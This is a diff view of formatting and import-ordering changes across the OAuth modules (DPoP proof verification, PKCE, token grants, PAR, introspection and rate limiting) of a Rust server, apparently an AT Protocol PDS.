pub did: String,
···
49
49
}))
50
50
}
51
51
52
-
pub async fn update_device_last_seen(
53
-
pool: &PgPool,
54
-
device_id: &str,
55
-
) -> Result<(), OAuthError> {
52
+
pub async fn update_device_last_seen(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
56
53
sqlx::query!(
57
54
r#"
58
55
UPDATE oauth_device
+2
-5
src/oauth/db/dpop.rs
+2
-5
src/oauth/db/dpop.rs
···
1
-
use sqlx::PgPool;
2
1
use super::super::OAuthError;
2
+
use sqlx::PgPool;
3
3
4
-
pub async fn check_and_record_dpop_jti(
5
-
pool: &PgPool,
6
-
jti: &str,
7
-
) -> Result<bool, OAuthError> {
4
+
pub async fn check_and_record_dpop_jti(pool: &PgPool, jti: &str) -> Result<bool, OAuthError> {
8
5
let result = sqlx::query!(
9
6
r#"
10
7
INSERT INTO oauth_dpop_jti (jti)
+1
-1
src/oauth/db/helpers.rs
+1
-1
src/oauth/db/helpers.rs
+5
-5
src/oauth/db/mod.rs
+5
-5
src/oauth/db/mod.rs
···
8
8
9
9
pub use client::{get_authorized_client, upsert_authorized_client};
10
10
pub use device::{
11
-
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
12
-
upsert_account_device, verify_account_on_device, DeviceAccountRow,
11
+
DeviceAccountRow, create_device, delete_device, get_device, get_device_accounts,
12
+
update_device_last_seen, upsert_account_device, verify_account_on_device,
13
13
};
14
14
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
15
15
pub use request::{
···
23
23
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
24
24
};
25
25
pub use two_factor::{
26
-
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
27
-
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
28
-
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
26
+
TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
27
+
create_2fa_challenge, delete_2fa_challenge, delete_2fa_challenge_by_request_uri,
28
+
generate_2fa_code, get_2fa_challenge, increment_2fa_attempts,
29
29
};
+1
-1
src/oauth/db/request.rs
+1
-1
src/oauth/db/request.rs
+4
-10
src/oauth/db/token.rs
+4
-10
src/oauth/db/token.rs
···
1
+
use super::super::{OAuthError, TokenData};
2
+
use super::helpers::{from_json, to_json};
1
3
use chrono::{DateTime, Utc};
2
4
use sqlx::PgPool;
3
-
use super::super::{OAuthError, TokenData};
4
-
use super::helpers::{from_json, to_json};
5
5
6
-
pub async fn create_token(
7
-
pool: &PgPool,
8
-
data: &TokenData,
9
-
) -> Result<i32, OAuthError> {
6
+
pub async fn create_token(pool: &PgPool, data: &TokenData) -> Result<i32, OAuthError> {
10
7
let client_auth_json = to_json(&data.client_auth)?;
11
8
let parameters_json = to_json(&data.parameters)?;
12
9
let row = sqlx::query!(
···
193
190
Ok(())
194
191
}
195
192
196
-
pub async fn list_tokens_for_user(
197
-
pool: &PgPool,
198
-
did: &str,
199
-
) -> Result<Vec<TokenData>, OAuthError> {
193
+
pub async fn list_tokens_for_user(pool: &PgPool, did: &str) -> Result<Vec<TokenData>, OAuthError> {
200
194
let rows = sqlx::query!(
201
195
r#"
202
196
SELECT did, token_id, created_at, updated_at, expires_at, client_id, client_auth,
+1
-1
src/oauth/db/two_factor.rs
+1
-1
src/oauth/db/two_factor.rs
+79
-48
src/oauth/dpop.rs
+79
-48
src/oauth/dpop.rs
···
61
61
let timestamp_bytes = timestamp.to_be_bytes();
62
62
let mut hasher = Sha256::new();
63
63
hasher.update(&self.secret);
64
-
hasher.update(×tamp_bytes);
64
+
hasher.update(timestamp_bytes);
65
65
let hash = hasher.finalize();
66
66
let mut nonce_data = Vec::with_capacity(8 + 16);
67
67
nonce_data.extend_from_slice(×tamp_bytes);
···
74
74
.decode(nonce)
75
75
.map_err(|_| OAuthError::InvalidDpopProof("Invalid nonce encoding".to_string()))?;
76
76
if nonce_bytes.len() < 24 {
77
-
return Err(OAuthError::InvalidDpopProof("Invalid nonce length".to_string()));
77
+
return Err(OAuthError::InvalidDpopProof(
78
+
"Invalid nonce length".to_string(),
79
+
));
78
80
}
79
81
let timestamp_bytes: [u8; 8] = nonce_bytes[..8]
80
82
.try_into()
···
86
88
}
87
89
let mut hasher = Sha256::new();
88
90
hasher.update(&self.secret);
89
-
hasher.update(×tamp_bytes);
91
+
hasher.update(timestamp_bytes);
90
92
let expected_hash = hasher.finalize();
91
93
if nonce_bytes[8..24] != expected_hash[..16] {
92
-
return Err(OAuthError::InvalidDpopProof("Invalid nonce signature".to_string()));
94
+
return Err(OAuthError::InvalidDpopProof(
95
+
"Invalid nonce signature".to_string(),
96
+
));
93
97
}
94
98
Ok(())
95
99
}
···
103
107
) -> Result<DPoPVerifyResult, OAuthError> {
104
108
let parts: Vec<&str> = dpop_header.split('.').collect();
105
109
if parts.len() != 3 {
106
-
return Err(OAuthError::InvalidDpopProof("Invalid DPoP proof format".to_string()));
110
+
return Err(OAuthError::InvalidDpopProof(
111
+
"Invalid DPoP proof format".to_string(),
112
+
));
107
113
}
108
114
let header_json = URL_SAFE_NO_PAD
109
115
.decode(parts[0])
···
116
122
let payload: DPoPProofPayload = serde_json::from_slice(&payload_json)
117
123
.map_err(|_| OAuthError::InvalidDpopProof("Invalid payload JSON".to_string()))?;
118
124
if header.typ != "dpop+jwt" {
119
-
return Err(OAuthError::InvalidDpopProof("Invalid typ claim".to_string()));
125
+
return Err(OAuthError::InvalidDpopProof(
126
+
"Invalid typ claim".to_string(),
127
+
));
120
128
}
121
129
if !matches!(header.alg.as_str(), "ES256" | "ES384" | "ES512" | "EdDSA") {
122
-
return Err(OAuthError::InvalidDpopProof("Unsupported algorithm".to_string()));
130
+
return Err(OAuthError::InvalidDpopProof(
131
+
"Unsupported algorithm".to_string(),
132
+
));
123
133
}
124
134
if payload.htm.to_uppercase() != http_method.to_uppercase() {
125
-
return Err(OAuthError::InvalidDpopProof("HTTP method mismatch".to_string()));
135
+
return Err(OAuthError::InvalidDpopProof(
136
+
"HTTP method mismatch".to_string(),
137
+
));
126
138
}
127
139
let proof_uri = payload.htu.split('?').next().unwrap_or(&payload.htu);
128
140
let request_uri = http_uri.split('?').next().unwrap_or(http_uri);
129
141
if proof_uri != request_uri {
130
-
return Err(OAuthError::InvalidDpopProof("HTTP URI mismatch".to_string()));
142
+
return Err(OAuthError::InvalidDpopProof(
143
+
"HTTP URI mismatch".to_string(),
144
+
));
131
145
}
132
146
let now = Utc::now().timestamp();
133
147
if (now - payload.iat).abs() > DPOP_MAX_AGE_SECS {
134
-
return Err(OAuthError::InvalidDpopProof("Proof too old or from the future".to_string()));
148
+
return Err(OAuthError::InvalidDpopProof(
149
+
"Proof too old or from the future".to_string(),
150
+
));
135
151
}
136
152
if let Some(nonce) = &payload.nonce {
137
153
self.validate_nonce(nonce)?;
···
155
171
.decode(parts[2])
156
172
.map_err(|_| OAuthError::InvalidDpopProof("Invalid signature encoding".to_string()))?;
157
173
let signing_input = format!("{}.{}", parts[0], parts[1]);
158
-
verify_dpop_signature(&header.alg, &header.jwk, signing_input.as_bytes(), &signature_bytes)?;
174
+
verify_dpop_signature(
175
+
&header.alg,
176
+
&header.jwk,
177
+
signing_input.as_bytes(),
178
+
&signature_bytes,
179
+
)?;
159
180
let jkt = compute_jwk_thumbprint(&header.jwk)?;
160
181
Ok(DPoPVerifyResult {
161
182
jkt,
···
186
207
use p256::ecdsa::{Signature, VerifyingKey};
187
208
use p256::elliptic_curve::sec1::FromEncodedPoint;
188
209
use p256::{AffinePoint, EncodedPoint};
189
-
let crv = jwk.crv.as_ref().ok_or_else(|| {
190
-
OAuthError::InvalidDpopProof("Missing crv for ES256".to_string())
191
-
})?;
210
+
let crv = jwk
211
+
.crv
212
+
.as_ref()
213
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for ES256".to_string()))?;
192
214
if crv != "P-256" {
193
215
return Err(OAuthError::InvalidDpopProof(format!(
194
216
"Invalid curve for ES256: {}",
···
196
218
)));
197
219
}
198
220
let x_bytes = URL_SAFE_NO_PAD
199
-
.decode(jwk.x.as_ref().ok_or_else(|| {
200
-
OAuthError::InvalidDpopProof("Missing x coordinate".to_string())
201
-
})?)
221
+
.decode(
222
+
jwk.x
223
+
.as_ref()
224
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?,
225
+
)
202
226
.map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?;
203
227
let y_bytes = URL_SAFE_NO_PAD
204
-
.decode(jwk.y.as_ref().ok_or_else(|| {
205
-
OAuthError::InvalidDpopProof("Missing y coordinate".to_string())
206
-
})?)
228
+
.decode(
229
+
jwk.y
230
+
.as_ref()
231
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing y coordinate".to_string()))?,
232
+
)
207
233
.map_err(|_| OAuthError::InvalidDpopProof("Invalid y encoding".to_string()))?;
208
234
let point = EncodedPoint::from_affine_coordinates(
209
235
x_bytes.as_slice().into(),
···
211
237
false,
212
238
);
213
239
let affine_opt: Option<AffinePoint> = AffinePoint::from_encoded_point(&point).into();
214
-
let affine = affine_opt
215
-
.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?;
240
+
let affine =
241
+
affine_opt.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?;
216
242
let verifying_key = VerifyingKey::from_affine(affine)
217
243
.map_err(|_| OAuthError::InvalidDpopProof("Invalid verifying key".to_string()))?;
218
244
let sig = Signature::from_slice(signature)
···
227
253
use p384::ecdsa::{Signature, VerifyingKey};
228
254
use p384::elliptic_curve::sec1::FromEncodedPoint;
229
255
use p384::{AffinePoint, EncodedPoint};
230
-
let crv = jwk.crv.as_ref().ok_or_else(|| {
231
-
OAuthError::InvalidDpopProof("Missing crv for ES384".to_string())
232
-
})?;
256
+
let crv = jwk
257
+
.crv
258
+
.as_ref()
259
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for ES384".to_string()))?;
233
260
if crv != "P-384" {
234
261
return Err(OAuthError::InvalidDpopProof(format!(
235
262
"Invalid curve for ES384: {}",
···
237
264
)));
238
265
}
239
266
let x_bytes = URL_SAFE_NO_PAD
240
-
.decode(jwk.x.as_ref().ok_or_else(|| {
241
-
OAuthError::InvalidDpopProof("Missing x coordinate".to_string())
242
-
})?)
267
+
.decode(
268
+
jwk.x
269
+
.as_ref()
270
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?,
271
+
)
243
272
.map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?;
244
273
let y_bytes = URL_SAFE_NO_PAD
245
-
.decode(jwk.y.as_ref().ok_or_else(|| {
246
-
OAuthError::InvalidDpopProof("Missing y coordinate".to_string())
247
-
})?)
274
+
.decode(
275
+
jwk.y
276
+
.as_ref()
277
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing y coordinate".to_string()))?,
278
+
)
248
279
.map_err(|_| OAuthError::InvalidDpopProof("Invalid y encoding".to_string()))?;
249
280
let point = EncodedPoint::from_affine_coordinates(
250
281
x_bytes.as_slice().into(),
···
252
283
false,
253
284
);
254
285
let affine_opt: Option<AffinePoint> = AffinePoint::from_encoded_point(&point).into();
255
-
let affine = affine_opt
256
-
.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?;
286
+
let affine =
287
+
affine_opt.ok_or_else(|| OAuthError::InvalidDpopProof("Invalid EC point".to_string()))?;
257
288
let verifying_key = VerifyingKey::from_affine(affine)
258
289
.map_err(|_| OAuthError::InvalidDpopProof("Invalid verifying key".to_string()))?;
259
290
let sig = Signature::from_slice(signature)
···
265
296
266
297
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
267
298
use ed25519_dalek::{Signature, VerifyingKey};
268
-
let crv = jwk.crv.as_ref().ok_or_else(|| {
269
-
OAuthError::InvalidDpopProof("Missing crv for EdDSA".to_string())
270
-
})?;
299
+
let crv = jwk
300
+
.crv
301
+
.as_ref()
302
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing crv for EdDSA".to_string()))?;
271
303
if crv != "Ed25519" {
272
304
return Err(OAuthError::InvalidDpopProof(format!(
273
305
"Invalid curve for EdDSA: {}",
···
275
307
)));
276
308
}
277
309
let x_bytes = URL_SAFE_NO_PAD
278
-
.decode(jwk.x.as_ref().ok_or_else(|| {
279
-
OAuthError::InvalidDpopProof("Missing x coordinate".to_string())
280
-
})?)
310
+
.decode(
311
+
jwk.x
312
+
.as_ref()
313
+
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing x coordinate".to_string()))?,
314
+
)
281
315
.map_err(|_| OAuthError::InvalidDpopProof("Invalid x encoding".to_string()))?;
282
-
let key_bytes: [u8; 32] = x_bytes.try_into().map_err(|_| {
283
-
OAuthError::InvalidDpopProof("Invalid Ed25519 key length".to_string())
284
-
})?;
316
+
let key_bytes: [u8; 32] = x_bytes
317
+
.try_into()
318
+
.map_err(|_| OAuthError::InvalidDpopProof("Invalid Ed25519 key length".to_string()))?;
285
319
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
286
320
.map_err(|_| OAuthError::InvalidDpopProof("Invalid Ed25519 key".to_string()))?;
287
321
let sig_bytes: [u8; 64] = signature.try_into().map_err(|_| {
···
308
342
.y
309
343
.as_ref()
310
344
.ok_or_else(|| OAuthError::InvalidDpopProof("Missing y".to_string()))?;
311
-
format!(
312
-
r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#,
313
-
crv, x, y
314
-
)
345
+
format!(r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#, crv, x, y)
315
346
}
316
347
"OKP" => {
317
348
let crv = jwk
···
333
364
let mut hasher = Sha256::new();
334
365
hasher.update(canonical.as_bytes());
335
366
let hash = hasher.finalize();
336
-
Ok(URL_SAFE_NO_PAD.encode(&hash))
367
+
Ok(URL_SAFE_NO_PAD.encode(hash))
337
368
}
338
369
339
370
pub fn compute_access_token_hash(access_token: &str) -> String {
340
371
let mut hasher = Sha256::new();
341
372
hasher.update(access_token.as_bytes());
342
373
let hash = hasher.finalize();
343
-
URL_SAFE_NO_PAD.encode(&hash)
374
+
URL_SAFE_NO_PAD.encode(hash)
344
375
}
345
376
346
377
#[cfg(test)]
+2
-2
src/oauth/endpoints/metadata.rs
+2
-2
src/oauth/endpoints/metadata.rs
···
1
+
use crate::oauth::jwks::{JwkSet, create_jwk_set};
2
+
use crate::state::AppState;
1
3
use axum::{Json, extract::State};
2
4
use serde::{Deserialize, Serialize};
3
-
use crate::state::AppState;
4
-
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
5
6
6
#[derive(Debug, Serialize, Deserialize)]
7
7
pub struct ProtectedResourceMetadata {
+2
-2
src/oauth/endpoints/mod.rs
+2
-2
src/oauth/endpoints/mod.rs
+12
-12
src/oauth/endpoints/par.rs
+12
-12
src/oauth/endpoints/par.rs
···
1
-
use axum::{
2
-
Form, Json,
3
-
extract::State,
4
-
http::HeaderMap,
1
+
use crate::oauth::{
2
+
AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId,
3
+
client::ClientMetadataCache, db,
5
4
};
5
+
use crate::state::{AppState, RateLimitKind};
6
+
use axum::{Form, Json, extract::State, http::HeaderMap};
6
7
use chrono::{Duration, Utc};
7
8
use serde::{Deserialize, Serialize};
8
-
use crate::state::{AppState, RateLimitKind};
9
-
use crate::oauth::{
10
-
AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId,
11
-
client::ClientMetadataCache,
12
-
db,
13
-
};
14
9
15
10
const PAR_EXPIRY_SECONDS: i64 = 600;
16
11
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
···
52
47
Form(request): Form<ParRequest>,
53
48
) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> {
54
49
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
55
-
if !state.check_rate_limit(RateLimitKind::OAuthPar, &client_ip).await {
50
+
if !state
51
+
.check_rate_limit(RateLimitKind::OAuthPar, &client_ip)
52
+
.await
53
+
{
56
54
tracing::warn!(ip = %client_ip, "OAuth PAR rate limit exceeded");
57
55
return Err(OAuthError::RateLimited);
58
56
}
···
61
59
"response_type must be 'code'".to_string(),
62
60
));
63
61
}
64
-
let code_challenge = request.code_challenge.as_ref()
62
+
let code_challenge = request
63
+
.code_challenge
64
+
.as_ref()
65
65
.filter(|s| !s.is_empty())
66
66
.ok_or_else(|| OAuthError::InvalidRequest("code_challenge is required".to_string()))?;
67
67
let code_challenge_method = request.code_challenge_method.as_deref().unwrap_or("");
+32
-32
src/oauth/endpoints/token/grants.rs
+32
-32
src/oauth/endpoints/token/grants.rs
···
1
-
use axum::http::HeaderMap;
2
-
use axum::Json;
3
-
use chrono::{Duration, Utc};
1
+
use super::helpers::{create_access_token, verify_pkce};
2
+
use super::types::{TokenRequest, TokenResponse};
4
3
use crate::config::AuthConfig;
5
-
use crate::state::AppState;
6
4
use crate::oauth::{
7
5
ClientAuth, OAuthError, RefreshToken, TokenData, TokenId,
8
6
client::{ClientMetadataCache, verify_client_auth},
9
7
db,
10
8
dpop::DPoPVerifier,
11
9
};
12
-
use super::types::{TokenRequest, TokenResponse};
13
-
use super::helpers::{create_access_token, verify_pkce};
10
+
use crate::state::AppState;
11
+
use axum::Json;
12
+
use axum::http::HeaderMap;
13
+
use chrono::{Duration, Utc};
14
14
15
15
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
16
16
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
···
31
31
.await?
32
32
.ok_or_else(|| OAuthError::InvalidGrant("Invalid or expired code".to_string()))?;
33
33
if auth_request.expires_at < Utc::now() {
34
-
return Err(OAuthError::InvalidGrant("Authorization code has expired".to_string()));
34
+
return Err(OAuthError::InvalidGrant(
35
+
"Authorization code has expired".to_string(),
36
+
));
35
37
}
36
-
if let Some(request_client_id) = &request.client_id {
37
-
if request_client_id != &auth_request.client_id {
38
+
if let Some(request_client_id) = &request.client_id
39
+
&& request_client_id != &auth_request.client_id {
38
40
return Err(OAuthError::InvalidGrant("client_id mismatch".to_string()));
39
41
}
40
-
}
41
42
let did = auth_request
42
43
.did
43
44
.ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?;
44
45
let client_metadata_cache = ClientMetadataCache::new(3600);
45
46
let client_metadata = client_metadata_cache.get(&auth_request.client_id).await?;
46
-
let client_auth = if let (Some(assertion), Some(assertion_type)) = (&request.client_assertion, &request.client_assertion_type) {
47
+
let client_auth = if let (Some(assertion), Some(assertion_type)) =
48
+
(&request.client_assertion, &request.client_assertion_type)
49
+
{
47
50
if assertion_type != "urn:ietf:params:oauth:client-assertion-type:jwt-bearer" {
48
51
return Err(OAuthError::InvalidClient(
49
52
"Unsupported client_assertion_type".to_string(),
···
61
64
};
62
65
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
63
66
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;
64
-
if let Some(redirect_uri) = &request.redirect_uri {
65
-
if redirect_uri != &auth_request.parameters.redirect_uri {
66
-
return Err(OAuthError::InvalidGrant("redirect_uri mismatch".to_string()));
67
+
if let Some(redirect_uri) = &request.redirect_uri
68
+
&& redirect_uri != &auth_request.parameters.redirect_uri {
69
+
return Err(OAuthError::InvalidGrant(
70
+
"redirect_uri mismatch".to_string(),
71
+
));
67
72
}
68
-
}
69
73
let dpop_jkt = if let Some(proof) = &dpop_proof {
70
74
let config = AuthConfig::get();
71
75
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
72
-
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
76
+
let pds_hostname =
77
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
73
78
let token_endpoint = format!("https://{}/oauth/token", pds_hostname);
74
79
let result = verifier.verify_proof(proof, "POST", &token_endpoint, None)?;
75
80
if !db::check_and_record_dpop_jti(&state.db, &result.jti).await? {
···
77
82
"DPoP proof has already been used".to_string(),
78
83
));
79
84
}
80
-
if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt {
81
-
if &result.jkt != expected_jkt {
85
+
if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt
86
+
&& &result.jkt != expected_jkt {
82
87
return Err(OAuthError::InvalidDpopProof(
83
88
"DPoP key binding mismatch".to_string(),
84
89
));
85
90
}
86
-
}
87
91
Some(result.jkt)
88
92
} else if auth_request.parameters.dpop_jkt.is_some() {
89
93
return Err(OAuthError::InvalidRequest(
···
124
128
let mut response_headers = HeaderMap::new();
125
129
let config = AuthConfig::get();
126
130
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
127
-
response_headers.insert(
128
-
"DPoP-Nonce",
129
-
verifier.generate_nonce().parse().unwrap(),
130
-
);
131
+
response_headers.insert("DPoP-Nonce", verifier.generate_nonce().parse().unwrap());
131
132
Ok((
132
133
response_headers,
133
134
Json(TokenResponse {
···
161
162
.ok_or_else(|| OAuthError::InvalidGrant("Invalid refresh token".to_string()))?;
162
163
if token_data.expires_at < Utc::now() {
163
164
db::delete_token_family(&state.db, db_id).await?;
164
-
return Err(OAuthError::InvalidGrant("Refresh token has expired".to_string()));
165
+
return Err(OAuthError::InvalidGrant(
166
+
"Refresh token has expired".to_string(),
167
+
));
165
168
}
166
169
let dpop_jkt = if let Some(proof) = &dpop_proof {
167
170
let config = AuthConfig::get();
168
171
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
169
-
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
172
+
let pds_hostname =
173
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
170
174
let token_endpoint = format!("https://{}/oauth/token", pds_hostname);
171
175
let result = verifier.verify_proof(proof, "POST", &token_endpoint, None)?;
172
176
if !db::check_and_record_dpop_jti(&state.db, &result.jti).await? {
···
174
178
"DPoP proof has already been used".to_string(),
175
179
));
176
180
}
177
-
if let Some(expected_jkt) = &token_data.parameters.dpop_jkt {
178
-
if &result.jkt != expected_jkt {
181
+
if let Some(expected_jkt) = &token_data.parameters.dpop_jkt
182
+
&& &result.jkt != expected_jkt {
179
183
return Err(OAuthError::InvalidDpopProof(
180
184
"DPoP key binding mismatch".to_string(),
181
185
));
182
186
}
183
-
}
184
187
Some(result.jkt)
185
188
} else if token_data.parameters.dpop_jkt.is_some() {
186
189
return Err(OAuthError::InvalidRequest(
···
204
207
let mut response_headers = HeaderMap::new();
205
208
let config = AuthConfig::get();
206
209
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
207
-
response_headers.insert(
208
-
"DPoP-Nonce",
209
-
verifier.generate_nonce().parse().unwrap(),
210
-
);
210
+
response_headers.insert("DPoP-Nonce", verifier.generate_nonce().parse().unwrap());
211
211
Ok((
212
212
response_headers,
213
213
Json(TokenResponse {
+21
-9
src/oauth/endpoints/token/helpers.rs
+21
-9
src/oauth/endpoints/token/helpers.rs
···
1
+
use crate::config::AuthConfig;
2
+
use crate::oauth::OAuthError;
1
3
use base64::Engine;
2
4
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
3
5
use chrono::Utc;
4
6
use hmac::Mac;
5
7
use sha2::{Digest, Sha256};
6
8
use subtle::ConstantTimeEq;
7
-
use crate::config::AuthConfig;
8
-
use crate::oauth::OAuthError;
9
9
10
10
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
11
11
···
19
19
let mut hasher = Sha256::new();
20
20
hasher.update(code_verifier.as_bytes());
21
21
let hash = hasher.finalize();
22
-
let computed_challenge = URL_SAFE_NO_PAD.encode(&hash);
23
-
if !bool::from(computed_challenge.as_bytes().ct_eq(code_challenge.as_bytes())) {
24
-
return Err(OAuthError::InvalidGrant("PKCE verification failed".to_string()));
22
+
let computed_challenge = URL_SAFE_NO_PAD.encode(hash);
23
+
if !bool::from(
24
+
computed_challenge
25
+
.as_bytes()
26
+
.ct_eq(code_challenge.as_bytes()),
27
+
) {
28
+
return Err(OAuthError::InvalidGrant(
29
+
"PKCE verification failed".to_string(),
30
+
));
25
31
}
26
32
Ok(())
27
33
}
···
61
67
.map_err(|_| OAuthError::ServerError("HMAC key error".to_string()))?;
62
68
mac.update(signing_input.as_bytes());
63
69
let signature = mac.finalize().into_bytes();
64
-
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
70
+
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
65
71
Ok(format!("{}.{}", signing_input, signature_b64))
66
72
}
67
73
···
76
82
let header: serde_json::Value = serde_json::from_slice(&header_bytes)
77
83
.map_err(|_| OAuthError::InvalidToken("Invalid token header".to_string()))?;
78
84
if header.get("typ").and_then(|t| t.as_str()) != Some("at+jwt") {
79
-
return Err(OAuthError::InvalidToken("Not an OAuth access token".to_string()));
85
+
return Err(OAuthError::InvalidToken(
86
+
"Not an OAuth access token".to_string(),
87
+
));
80
88
}
81
89
if header.get("alg").and_then(|a| a.as_str()) != Some("HS256") {
82
-
return Err(OAuthError::InvalidToken("Unsupported algorithm".to_string()));
90
+
return Err(OAuthError::InvalidToken(
91
+
"Unsupported algorithm".to_string(),
92
+
));
83
93
}
84
94
let config = AuthConfig::get();
85
95
let secret = config.jwt_secret();
···
93
103
mac.update(signing_input.as_bytes());
94
104
let expected_sig = mac.finalize().into_bytes();
95
105
if !bool::from(expected_sig.ct_eq(&provided_sig)) {
96
-
return Err(OAuthError::InvalidToken("Invalid token signature".to_string()));
106
+
return Err(OAuthError::InvalidToken(
107
+
"Invalid token signature".to_string(),
108
+
));
97
109
}
98
110
let payload_bytes = URL_SAFE_NO_PAD
99
111
.decode(parts[1])
+12
-6
src/oauth/endpoints/token/introspect.rs
+12
-6
src/oauth/endpoints/token/introspect.rs
···
1
-
use axum::{Form, Json};
1
+
use super::helpers::extract_token_claims;
2
+
use crate::oauth::{OAuthError, db};
3
+
use crate::state::{AppState, RateLimitKind};
2
4
use axum::extract::State;
3
5
use axum::http::{HeaderMap, StatusCode};
6
+
use axum::{Form, Json};
4
7
use chrono::Utc;
5
8
use serde::{Deserialize, Serialize};
6
-
use crate::state::{AppState, RateLimitKind};
7
-
use crate::oauth::{OAuthError, db};
8
-
use super::helpers::extract_token_claims;
9
9
10
10
#[derive(Debug, Deserialize)]
11
11
pub struct RevokeRequest {
···
20
20
Form(request): Form<RevokeRequest>,
21
21
) -> Result<StatusCode, OAuthError> {
22
22
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
23
-
if !state.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip).await {
23
+
if !state
24
+
.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip)
25
+
.await
26
+
{
24
27
tracing::warn!(ip = %client_ip, "OAuth revoke rate limit exceeded");
25
28
return Err(OAuthError::RateLimited);
26
29
}
···
74
77
Form(request): Form<IntrospectRequest>,
75
78
) -> Result<Json<IntrospectResponse>, OAuthError> {
76
79
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
77
-
if !state.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip).await {
80
+
if !state
81
+
.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip)
82
+
.await
83
+
{
78
84
tracing::warn!(ip = %client_ip, "OAuth introspect rate limit exceeded");
79
85
return Err(OAuthError::RateLimited);
80
86
}
+14
-20
src/oauth/endpoints/token/mod.rs
+14
-20
src/oauth/endpoints/token/mod.rs
···
3
3
mod introspect;
4
4
mod types;
5
5
6
-
use axum::{
7
-
Form, Json,
8
-
extract::State,
9
-
http::HeaderMap,
10
-
};
6
+
use crate::oauth::OAuthError;
11
7
use crate::state::{AppState, RateLimitKind};
12
-
use crate::oauth::OAuthError;
8
+
use axum::{Form, Json, extract::State, http::HeaderMap};
13
9
14
10
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
15
-
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
11
+
pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce};
16
12
pub use introspect::{
17
-
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
13
+
IntrospectRequest, IntrospectResponse, RevokeRequest, introspect_token, revoke_token,
18
14
};
19
15
pub use types::{TokenRequest, TokenResponse};
20
16
21
17
fn extract_client_ip(headers: &HeaderMap) -> String {
22
-
if let Some(forwarded) = headers.get("x-forwarded-for") {
23
-
if let Ok(value) = forwarded.to_str() {
24
-
if let Some(first_ip) = value.split(',').next() {
18
+
if let Some(forwarded) = headers.get("x-forwarded-for")
19
+
&& let Ok(value) = forwarded.to_str()
20
+
&& let Some(first_ip) = value.split(',').next() {
25
21
return first_ip.trim().to_string();
26
22
}
27
-
}
28
-
}
29
-
if let Some(real_ip) = headers.get("x-real-ip") {
30
-
if let Ok(value) = real_ip.to_str() {
23
+
if let Some(real_ip) = headers.get("x-real-ip")
24
+
&& let Ok(value) = real_ip.to_str() {
31
25
return value.trim().to_string();
32
26
}
33
-
}
34
27
"unknown".to_string()
35
28
}
36
29
···
40
33
Form(request): Form<TokenRequest>,
41
34
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
42
35
let client_ip = extract_client_ip(&headers);
43
-
if !state.check_rate_limit(RateLimitKind::OAuthToken, &client_ip).await {
36
+
if !state
37
+
.check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
38
+
.await
39
+
{
44
40
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
